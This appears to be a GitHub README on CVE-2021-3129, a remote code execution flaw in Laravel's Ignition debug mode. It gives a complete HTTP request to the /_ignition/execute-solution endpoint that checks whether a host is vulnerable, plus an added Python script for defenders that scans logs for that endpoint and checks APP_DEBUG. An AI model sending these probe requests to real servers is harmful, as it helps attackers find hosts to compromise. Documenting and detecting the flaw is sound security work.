keyuan15/CVE-2021-3129

CVE-2021-3129

Laravel RCE CVE-2021-3129

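Vulnerability overview

When Laravel runs with Debug mode enabled, the bundled Ignition component uses file_get_contents() and file_put_contents() unsafely. An attacker can send malicious requests, for example to construct a malicious log file, and trigger Phar deserialization, ultimately achieving remote code execution.

Affected versions

Laravel <= 8.4.2

Vulnerability verification

  • A 500 response indicates that the vulnerability is present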
POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.24.153:8888
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution&parameters[variableName]=cve20213129&parameters[viewFile]=null
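
For defenders, the request above gives a concrete detection target. The following is an added example, not part of the original repository: it scans web access logs for requests to the Ignition endpoint, lists the clients that received the 500 response described above, and checks a .env body for APP_DEBUG. The log layout, the sample lines and all function names are assumptions made for this example.

```python
import re
from collections import defaultdict

IGNITION_PATH = "/_ignition/execute-solution"  # endpoint from the request above
# Common/combined access-log layout (assumed; adapt to your server's format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample lines (documentation-range addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jan/2021:10:01:02 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 1203 "-" "curl/7.68.0"',
    '203.0.113.7 - - [12/Jan/2021:10:01:05 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 2 "-" "curl/7.68.0"',
    '198.51.100.4 - - [12/Jan/2021:10:02:00 +0000] "GET /login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Jan/2021:10:03:00 +0000] "POST /_ignition/execute-solution/ HTTP/1.1" 404 153 "-" "-"',
]

def find_ignition_requests(lines):
    """Return {client_ip: [(timestamp, method, status), ...]} for endpoint hits."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Compare the path only: drop query string, trailing slash and case.
        path = m["target"].split("?", 1)[0].rstrip("/").lower()
        if path == IGNITION_PATH:
            hits[m["ip"]].append((m["ts"], m["method"], int(m["status"])))
    return dict(hits)

def ips_with_500(hits):
    """Clients that received the 500 response the page ties to a vulnerable host."""
    return sorted(ip for ip, ev in hits.items() if any(s == 500 for _, _, s in ev))

def debug_enabled(env_text):
    """True if a .env file body sets APP_DEBUG to a true value (comments ignored)."""
    for raw in env_text.splitlines():
        line = raw.strip()
        if line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        if key.strip() == "APP_DEBUG":
            return value.strip().strip("\"'").lower() in ("true", "(true)", "1")
    return False

if __name__ == "__main__":
    hits = find_ignition_requests(SAMPLE_LOG)
    print(hits)
    print(ips_with_500(hits), debug_enabled("APP_DEBUG=true"))
```

Any hit on this path from outside a development workstation deserves review, and a host whose .env enables APP_DEBUG in production should have it turned off.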

Exploit script

image

References

[CVE-2021-3129] Laravel Debug mode RCE reproduction | tyskillのBlog

SNCKER/CVE-2021-3129: Laravel debug rce (github.com)

zhzyker/CVE-2021-3129: Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129) (github.com)
